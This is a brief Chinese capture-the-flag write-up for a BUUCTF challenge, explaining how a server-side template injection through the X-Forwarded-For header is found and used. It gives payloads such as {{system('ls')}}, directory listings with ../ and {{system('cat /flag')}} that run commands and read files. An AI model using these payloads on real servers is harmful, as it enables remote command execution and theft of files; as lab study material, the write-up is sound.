BUUCTF | [MRCTF2020]Ez_bypass
知识点👇
①XFF
②SSTI
解题:
打开连接发现有一个很显眼的名字flag,发现显示ip地址,猜测是xff注入
尝试修改X-Forwarded-For:111
输入与回显一样,猜测可能是SSTI,构造X-Forwarded-For:{{1+1}}
确定是SSTI,构造X-Forwarded-For:{{system('ls')}}
构造X-Forwarded-for:{{system('cat /flag.php')}}
发现没有回显
构造X-Forwarded-for:{{system('ls ../../..')}},逐级增加../,发现flag
构造X-Forwarded-for:{{system('cat /flag')}}得到flag